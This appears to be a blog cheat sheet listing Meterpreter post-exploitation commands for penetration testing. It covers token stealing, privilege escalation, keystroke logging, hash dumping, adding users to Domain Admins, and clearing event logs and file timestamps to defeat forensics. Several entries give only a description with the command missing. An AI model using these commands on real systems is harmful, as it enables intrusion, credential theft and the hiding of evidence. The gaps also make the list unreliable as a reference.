Here is a list with all the Meterpreter commands that can be used for post exploitation in a penetration testing.


Open Meterpreter usage help

run scriptname

Run Meterpreter-based scripts; for a full list check the scripts/meterpreter


Show the system information on the remote target


List the files and folders on the target

use priv

Load the privilege extension for extended Meterpreter libraries


Show all running processes and which accounts are associated with each process

migrate PID

Migrate to the specific process ID (PID is the target process ID gained
from the ps command)

use incognito

Load incognito functions. (Used for token stealing and impersonation on
a target machine)

list_tokens -u

List available tokens on the target by user

list_tokens -g

List available tokens on the target by group

impersonate_token DOMAIN_NAME\\USERNAME

Impersonate a token available on the target

steal_token PID

Steal the tokens available for a given process and impersonate that token


Stop impersonating the current token


Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors


Drop into an interactive shell with all available tokens

execute -f cmd.exe -i

Execute cmd.exe and interact with it

execute -f cmd.exe -i -t

Execute cmd.exe with all available tokens

execute -f cmd.exe -i -H -t

Execute cmd.exe with all available tokens and make it a hidden process


Revert back to the original user you used to compromise the target

reg command

Interact, create, delete, query, set, and much more in the target’s registry

setdesktop number

Switch to a different screen based on who is logged in


Take a screenshot of the target’s screen

upload file

Upload a file to the target

download file

Download a file from the target


Start sniffing keystrokes on the remote target


Dump the remote keys captured on the target


Stop sniffing keystrokes on the remote target


Get as many privileges as possible on the target

uictl enable keyboard/mouse

Take control of the keyboard and/or mouse


Run your current Meterpreter shell in the background


Dump all hashes on the target

use sniffer

Load the sniffer module


List the available interfaces on the target

sniffer_dump interfaceID pcapname

Start sniffing on the remote target

sniffer_start interfaceID packet-buffer

Start sniffing with a specific range for a packet buffer

sniffer_stats interfaceID

Grab statistical information from the interface you are sniffing

sniffer_stop interfaceID

Stop the sniffer

add_user username password -h ip

Add a user on the remote target

add_group_user “Domain Admins” username -h ip

Add a username to the Domain Administrators group on the remote target


Clear the event log on the target machine


Change file attributes, such as creation date (antiforensics measure)


Reboot the target machine

1 Comment

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s